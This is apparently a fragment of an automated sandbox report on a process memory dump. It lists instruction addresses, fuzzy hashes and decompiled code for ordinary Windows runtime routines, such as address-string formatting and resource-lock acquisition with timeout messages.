                                                                                                                                                                                                          0x009322bc
                                                                                                                                                                                                          0x009322bc
                                                                                                                                                                                                          0x009322bc
                                                                                                                                                                                                          0x009322be
                                                                                                                                                                                                          0x009322c4
                                                                                                                                                                                                          0x009322cc
                                                                                                                                                                                                          0x009322d0
                                                                                                                                                                                                          0x009322d6
                                                                                                                                                                                                          0x009322d7
                                                                                                                                                                                                          0x009322da
                                                                                                                                                                                                          0x009322df
                                                                                                                                                                                                          0x009322e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322e6
                                                                                                                                                                                                          0x009322e9
                                                                                                                                                                                                          0x009322f4
                                                                                                                                                                                                          0x009322f9
                                                                                                                                                                                                          0x009322fa
                                                                                                                                                                                                          0x00932305
                                                                                                                                                                                                          0x00932314
                                                                                                                                                                                                          0x00932319
                                                                                                                                                                                                          0x0093231a
                                                                                                                                                                                                          0x0093231d
                                                                                                                                                                                                          0x00932320
                                                                                                                                                                                                          0x00932323
                                                                                                                                                                                                          0x00932323
                                                                                                                                                                                                          0x00932328
                                                                                                                                                                                                          0x0093232d
                                                                                                                                                                                                          0x0093232f
                                                                                                                                                                                                          0x00932331
                                                                                                                                                                                                          0x00932336
                                                                                                                                                                                                          0x00932336
                                                                                                                                                                                                          0x0093233b
                                                                                                                                                                                                          0x0093233d
                                                                                                                                                                                                          0x00932350
                                                                                                                                                                                                          0x00932351
                                                                                                                                                                                                          0x00932356
                                                                                                                                                                                                          0x00932359
                                                                                                                                                                                                          0x00932359
                                                                                                                                                                                                          0x0093235b
                                                                                                                                                                                                          0x0093235d
                                                                                                                                                                                                          0x008f5367
                                                                                                                                                                                                          0x008f536b
                                                                                                                                                                                                          0x008f5372
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932363
                                                                                                                                                                                                          0x00932363
                                                                                                                                                                                                          0x00932369
                                                                                                                                                                                                          0x0093236a
                                                                                                                                                                                                          0x0093236c
                                                                                                                                                                                                          0x00932371
                                                                                                                                                                                                          0x00932373
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932379
                                                                                                                                                                                                          0x00932379
                                                                                                                                                                                                          0x0093237a
                                                                                                                                                                                                          0x0093237f
                                                                                                                                                                                                          0x0093237f
                                                                                                                                                                                                          0x00932385
                                                                                                                                                                                                          0x00932386
                                                                                                                                                                                                          0x00932389
                                                                                                                                                                                                          0x0093238e
                                                                                                                                                                                                          0x00932390
                                                                                                                                                                                                          0x008f5378
                                                                                                                                                                                                          0x008f537c
                                                                                                                                                                                                          0x00932396
                                                                                                                                                                                                          0x00932396
                                                                                                                                                                                                          0x00932397
                                                                                                                                                                                                          0x0093239c
                                                                                                                                                                                                          0x009323a2
                                                                                                                                                                                                          0x009323a3
                                                                                                                                                                                                          0x009323a6
                                                                                                                                                                                                          0x009323ab
                                                                                                                                                                                                          0x009323ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009323b3
                                                                                                                                                                                                          0x009323b3
                                                                                                                                                                                                          0x009323b4
                                                                                                                                                                                                          0x009323b9
                                                                                                                                                                                                          0x009323ba
                                                                                                                                                                                                          0x009323ba
                                                                                                                                                                                                          0x009323bc
                                                                                                                                                                                                          0x009323bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00929153
                                                                                                                                                                                                          0x00929158
                                                                                                                                                                                                          0x0092915a
                                                                                                                                                                                                          0x0092915e
                                                                                                                                                                                                          0x00929160
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00929166
                                                                                                                                                                                                          0x00929166
                                                                                                                                                                                                          0x00929171
                                                                                                                                                                                                          0x00929176
                                                                                                                                                                                                          0x00929176
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00929160
                                                                                                                                                                                                          0x009323c6
                                                                                                                                                                                                          0x009323ce
                                                                                                                                                                                                          0x009323d7
                                                                                                                                                                                                          0x009323d7
                                                                                                                                                                                                          0x009323ad
                                                                                                                                                                                                          0x00932390
                                                                                                                                                                                                          0x00932373
                                                                                                                                                                                                          0x0093233f
                                                                                                                                                                                                          0x0093233f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093233f
                                                                                                                                                                                                          0x00932291
                                                                                                                                                                                                          0x00932291
                                                                                                                                                                                                          0x00932293
                                                                                                                                                                                                          0x00932295
                                                                                                                                                                                                          0x0093229a
                                                                                                                                                                                                          0x009322a1
                                                                                                                                                                                                          0x009322a3
                                                                                                                                                                                                          0x009322a7
                                                                                                                                                                                                          0x009322a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322ab
                                                                                                                                                                                                          0x009322ad
                                                                                                                                                                                                          0x009322af
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322af
                                                                                                                                                                                                          0x009322b1
                                                                                                                                                                                                          0x009322b4
                                                                                                                                                                                                          0x009322b4
                                                                                                                                                                                                          0x009322b6
                                                                                                                                                                                                          0x008f53be
                                                                                                                                                                                                          0x008f53be
                                                                                                                                                                                                          0x008f53be
                                                                                                                                                                                                          0x008f53c0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f53cb
                                                                                                                                                                                                          0x008f53ce
                                                                                                                                                                                                          0x008f53d0
                                                                                                                                                                                                          0x008f53d4
                                                                                                                                                                                                          0x008f53d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f53d8
                                                                                                                                                                                                          0x008f53e3
                                                                                                                                                                                                          0x008f53ea
                                                                                                                                                                                                          0x008f53ea
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f53d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093228f
                                                                                                                                                                                                          0x00932349
                                                                                                                                                                                                          0x0093234d
                                                                                                                                                                                                          0x00932251
                                                                                                                                                                                                          0x00932251
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932251
                                                                                                                                                                                                          0x009321a4
                                                                                                                                                                                                          0x009321a4
                                                                                                                                                                                                          0x009321a6
                                                                                                                                                                                                          0x009321a8
                                                                                                                                                                                                          0x009321ac
                                                                                                                                                                                                          0x009321b6
                                                                                                                                                                                                          0x009321b8
                                                                                                                                                                                                          0x009321bc
                                                                                                                                                                                                          0x009321be
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009321c0
                                                                                                                                                                                                          0x009321c2
                                                                                                                                                                                                          0x009321c4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009321c4
                                                                                                                                                                                                          0x009321c6
                                                                                                                                                                                                          0x009321c6
                                                                                                                                                                                                          0x009321c8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009321c8
                                                                                                                                                                                                          0x009321a2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932183
                                                                                                                                                                                                          0x0091057b
                                                                                                                                                                                                          0x0091057d
                                                                                                                                                                                                          0x00910581
                                                                                                                                                                                                          0x00910583
                                                                                                                                                                                                          0x00932178
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910589
                                                                                                                                                                                                          0x0091058f
                                                                                                                                                                                                          0x0091058f
                                                                                                                                                                                                          0x00910583
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00932206
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                          • API String ID: 885266447-4236105082
                                                                                                                                                                                                          • Opcode ID: 20596a9b94ef2d0a416c7791c56a5f7929d12b4115e9be6a6c86df86e026be5b
                                                                                                                                                                                                          • Instruction ID: 23833a554ffb31749fbd20ba2a46525f3b705d0a0be1ace1d44800ba06187315
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20596a9b94ef2d0a416c7791c56a5f7929d12b4115e9be6a6c86df86e026be5b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D5127717042156BEB14CB19DC81FA733AEEBD4720F218229FD65DB386DA75EC818B90
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 009114C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                          			E009114C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9b2088; // 0x7753cceb
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00907707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009113CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00907707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00907707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E008D2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E008DE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                                                                          0x009114c0
                                                                                                                                                                                                          0x009114cb
                                                                                                                                                                                                          0x009114d2
                                                                                                                                                                                                          0x009114d6
                                                                                                                                                                                                          0x009114da
                                                                                                                                                                                                          0x009114de
                                                                                                                                                                                                          0x009114e3
                                                                                                                                                                                                          0x0091157a
                                                                                                                                                                                                          0x0091157a
                                                                                                                                                                                                          0x009114f1
                                                                                                                                                                                                          0x009114f3
                                                                                                                                                                                                          0x0093ea0f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093ea15
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093ea15
                                                                                                                                                                                                          0x009114f9
                                                                                                                                                                                                          0x009114f9
                                                                                                                                                                                                          0x009114fe
                                                                                                                                                                                                          0x00911504
                                                                                                                                                                                                          0x0093ea1a
                                                                                                                                                                                                          0x0093ea1f
                                                                                                                                                                                                          0x0093ea21
                                                                                                                                                                                                          0x0093ea22
                                                                                                                                                                                                          0x0093ea27
                                                                                                                                                                                                          0x0093ea2a
                                                                                                                                                                                                          0x0093ea2a
                                                                                                                                                                                                          0x00911515
                                                                                                                                                                                                          0x00911517
                                                                                                                                                                                                          0x0091156d
                                                                                                                                                                                                          0x00911572
                                                                                                                                                                                                          0x00911575
                                                                                                                                                                                                          0x00911575
                                                                                                                                                                                                          0x0091151e
                                                                                                                                                                                                          0x0093ea50
                                                                                                                                                                                                          0x0093ea55
                                                                                                                                                                                                          0x0093ea58
                                                                                                                                                                                                          0x0093ea58
                                                                                                                                                                                                          0x0091152e
                                                                                                                                                                                                          0x00911531
                                                                                                                                                                                                          0x00911533
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00911535
                                                                                                                                                                                                          0x00911541
                                                                                                                                                                                                          0x00911549
                                                                                                                                                                                                          0x00911549
                                                                                                                                                                                                          0x00911533
                                                                                                                                                                                                          0x009114f3
                                                                                                                                                                                                          0x00911559

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 0093EA22
                                                                                                                                                                                                            • Part of subcall function 009113CB: ___swprintf_l.LIBCMT ref: 0091146B
                                                                                                                                                                                                            • Part of subcall function 009113CB: ___swprintf_l.LIBCMT ref: 00911490
                                                                                                                                                                                                          • ___swprintf_l.LIBCMT ref: 0091156D
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ___swprintf_l
                                                                                                                                                                                                          • String ID: %%%u$]:%u
                                                                                                                                                                                                          • API String ID: 48624451-3050659472
                                                                                                                                                                                                          • Opcode ID: 7bce843690f61ed57dc5920b09d3ad977413dc786030d1e3a33b90c63e9cbc21
                                                                                                                                                                                                          • Instruction ID: 39b2492fc980205c992cc91140eda90a83988562851e9b8d81dabc327dd9ce90
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bce843690f61ed57dc5920b09d3ad977413dc786030d1e3a33b90c63e9cbc21
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60219372A0021DABCF21DE58CC41AEA73BDFB90710F544556FD56D3280EB74AA988BE1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008F53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                                          			E008F53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009b01c0;
									_push(_t92);
									_push(0);
									_t37 = E008CF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00914FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00923F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00923F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0095217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00923F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00913915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E008F5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E008CF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00913915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E008CF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00913915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E008CF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00913915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E008F5329(_t74, _t92);
													_push(1);
													_t48 = E008F53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                                                                          0x008f53ab
                                                                                                                                                                                                          0x008f53ae
                                                                                                                                                                                                          0x008f53b1
                                                                                                                                                                                                          0x008f53b4
                                                                                                                                                                                                          0x008f53b7
                                                                                                                                                                                                          0x009105b6
                                                                                                                                                                                                          0x009105c0
                                                                                                                                                                                                          0x009105c3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009105c9
                                                                                                                                                                                                          0x009105c9
                                                                                                                                                                                                          0x009105cc
                                                                                                                                                                                                          0x009105d5
                                                                                                                                                                                                          0x009105d5
                                                                                                                                                                                                          0x008f53bd
                                                                                                                                                                                                          0x008f53bd
                                                                                                                                                                                                          0x008f53bd
                                                                                                                                                                                                          0x008f53be
                                                                                                                                                                                                          0x008f53be
                                                                                                                                                                                                          0x008f53be
                                                                                                                                                                                                          0x008f53c0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932269
                                                                                                                                                                                                          0x0093226d
                                                                                                                                                                                                          0x00932349
                                                                                                                                                                                                          0x0093234d
                                                                                                                                                                                                          0x00932273
                                                                                                                                                                                                          0x00932276
                                                                                                                                                                                                          0x00932279
                                                                                                                                                                                                          0x0093227e
                                                                                                                                                                                                          0x00932283
                                                                                                                                                                                                          0x00932287
                                                                                                                                                                                                          0x0093228a
                                                                                                                                                                                                          0x0093228d
                                                                                                                                                                                                          0x0093228f
                                                                                                                                                                                                          0x009322bc
                                                                                                                                                                                                          0x009322bc
                                                                                                                                                                                                          0x009322bc
                                                                                                                                                                                                          0x009322be
                                                                                                                                                                                                          0x009322c4
                                                                                                                                                                                                          0x009322cc
                                                                                                                                                                                                          0x009322d0
                                                                                                                                                                                                          0x009322d6
                                                                                                                                                                                                          0x009322d7
                                                                                                                                                                                                          0x009322da
                                                                                                                                                                                                          0x009322df
                                                                                                                                                                                                          0x009322e4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322e6
                                                                                                                                                                                                          0x009322e9
                                                                                                                                                                                                          0x009322f4
                                                                                                                                                                                                          0x009322f9
                                                                                                                                                                                                          0x009322fa
                                                                                                                                                                                                          0x00932305
                                                                                                                                                                                                          0x00932314
                                                                                                                                                                                                          0x00932319
                                                                                                                                                                                                          0x0093231a
                                                                                                                                                                                                          0x0093231d
                                                                                                                                                                                                          0x00932320
                                                                                                                                                                                                          0x00932323
                                                                                                                                                                                                          0x00932323
                                                                                                                                                                                                          0x00932328
                                                                                                                                                                                                          0x0093232d
                                                                                                                                                                                                          0x0093232f
                                                                                                                                                                                                          0x00932331
                                                                                                                                                                                                          0x00932336
                                                                                                                                                                                                          0x00932336
                                                                                                                                                                                                          0x0093233b
                                                                                                                                                                                                          0x0093233d
                                                                                                                                                                                                          0x00932350
                                                                                                                                                                                                          0x00932351
                                                                                                                                                                                                          0x00932356
                                                                                                                                                                                                          0x00932359
                                                                                                                                                                                                          0x00932359
                                                                                                                                                                                                          0x0093235b
                                                                                                                                                                                                          0x0093235d
                                                                                                                                                                                                          0x008f5367
                                                                                                                                                                                                          0x008f536b
                                                                                                                                                                                                          0x008f5372
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932363
                                                                                                                                                                                                          0x00932363
                                                                                                                                                                                                          0x00932369
                                                                                                                                                                                                          0x0093236a
                                                                                                                                                                                                          0x0093236c
                                                                                                                                                                                                          0x00932371
                                                                                                                                                                                                          0x00932373
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00932379
                                                                                                                                                                                                          0x00932379
                                                                                                                                                                                                          0x0093237a
                                                                                                                                                                                                          0x0093237f
                                                                                                                                                                                                          0x0093237f
                                                                                                                                                                                                          0x00932385
                                                                                                                                                                                                          0x00932386
                                                                                                                                                                                                          0x00932389
                                                                                                                                                                                                          0x0093238e
                                                                                                                                                                                                          0x00932390
                                                                                                                                                                                                          0x008f5378
                                                                                                                                                                                                          0x008f537c
                                                                                                                                                                                                          0x00932396
                                                                                                                                                                                                          0x00932396
                                                                                                                                                                                                          0x00932397
                                                                                                                                                                                                          0x0093239c
                                                                                                                                                                                                          0x009323a2
                                                                                                                                                                                                          0x009323a3
                                                                                                                                                                                                          0x009323a6
                                                                                                                                                                                                          0x009323ab
                                                                                                                                                                                                          0x009323ad
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009323b3
                                                                                                                                                                                                          0x009323b3
                                                                                                                                                                                                          0x009323b4
                                                                                                                                                                                                          0x009323b9
                                                                                                                                                                                                          0x009323ba
                                                                                                                                                                                                          0x009323ba
                                                                                                                                                                                                          0x009323bc
                                                                                                                                                                                                          0x009323bf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00929153
                                                                                                                                                                                                          0x00929158
                                                                                                                                                                                                          0x0092915a
                                                                                                                                                                                                          0x0092915e
                                                                                                                                                                                                          0x00929160
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00929166
                                                                                                                                                                                                          0x00929166
                                                                                                                                                                                                          0x00929171
                                                                                                                                                                                                          0x00929176
                                                                                                                                                                                                          0x00929176
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00929160
                                                                                                                                                                                                          0x009323c6
                                                                                                                                                                                                          0x009323cb
                                                                                                                                                                                                          0x009323ce
                                                                                                                                                                                                          0x009323d7
                                                                                                                                                                                                          0x009323d7
                                                                                                                                                                                                          0x009323ad
                                                                                                                                                                                                          0x00932390
                                                                                                                                                                                                          0x00932373
                                                                                                                                                                                                          0x0093233f
                                                                                                                                                                                                          0x0093233f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093233f
                                                                                                                                                                                                          0x00932291
                                                                                                                                                                                                          0x00932291
                                                                                                                                                                                                          0x00932293
                                                                                                                                                                                                          0x00932295
                                                                                                                                                                                                          0x0093229a
                                                                                                                                                                                                          0x009322a1
                                                                                                                                                                                                          0x009322a3
                                                                                                                                                                                                          0x009322a7
                                                                                                                                                                                                          0x009322a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322ab
                                                                                                                                                                                                          0x009322ad
                                                                                                                                                                                                          0x009322af
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322af
                                                                                                                                                                                                          0x009322b1
                                                                                                                                                                                                          0x009322b4
                                                                                                                                                                                                          0x009322b4
                                                                                                                                                                                                          0x009322b6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x009322b6
                                                                                                                                                                                                          0x0093228f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093226d
                                                                                                                                                                                                          0x008f53cb
                                                                                                                                                                                                          0x008f53ce
                                                                                                                                                                                                          0x008f53d0
                                                                                                                                                                                                          0x008f53d4
                                                                                                                                                                                                          0x008f53d6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008f53d8
                                                                                                                                                                                                          0x008f53e3
                                                                                                                                                                                                          0x008f53ea
                                                                                                                                                                                                          0x008f53ea
                                                                                                                                                                                                          0x008f53d6
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009322F4
                                                                                                                                                                                                          Strings
